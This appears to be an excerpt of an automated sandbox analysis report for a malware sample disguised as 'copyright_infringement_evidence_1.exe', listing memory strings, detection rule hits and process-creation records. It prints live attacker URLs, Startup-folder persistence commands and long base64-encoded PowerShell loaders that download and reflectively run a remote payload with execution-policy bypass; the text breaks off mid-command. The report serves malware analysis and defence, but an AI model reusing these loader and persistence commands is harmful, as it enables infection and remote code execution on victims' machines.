            Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.00000254699A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/0Hqnx
            Source: wscript.exe, 0000000A.00000003.2753742233.00000245916EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756039132.00000245916F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C49BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C49BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/0HqnxP
            Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/0Hqnxte
            Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/0Hqnxza
            Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/6fcuV
            Source: wscript.exe, 00000008.00000002.2758183805.000001C4CE20F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749612240.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2745856502.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE20E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/6fcuVP
            Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/6fcuVee/d
            Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/0Hqnxku
            Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/0Hqnxky
            Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/0Hqnxu
            Source: wscript.exe, 00000008.00000003.2751834805.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749778775.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757726082.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/6fcuV
            Source: powershell.exe, 00000024.00000002.2530533193.000001EF69EA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF6A015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.gith
            Source: powershell.exe, 00000023.00000002.2350744372.000002080FEE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.co
            Source: powershell.exe, 00000023.00000002.2350744372.000002081137E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.00000208112E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF532A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF53306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
            Source: powershell.exe, 00000024.00000002.2351652248.000001EF51EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtKks;
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rdoge.ru/bee/config.json
            Source: copyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rdoge.ru/bee/config.jsonf
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com

            System Summary

            barindex
            Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8824, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: initial sampleStatic PE information: Filename: copyright_infringement_evidence_1.exe
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAc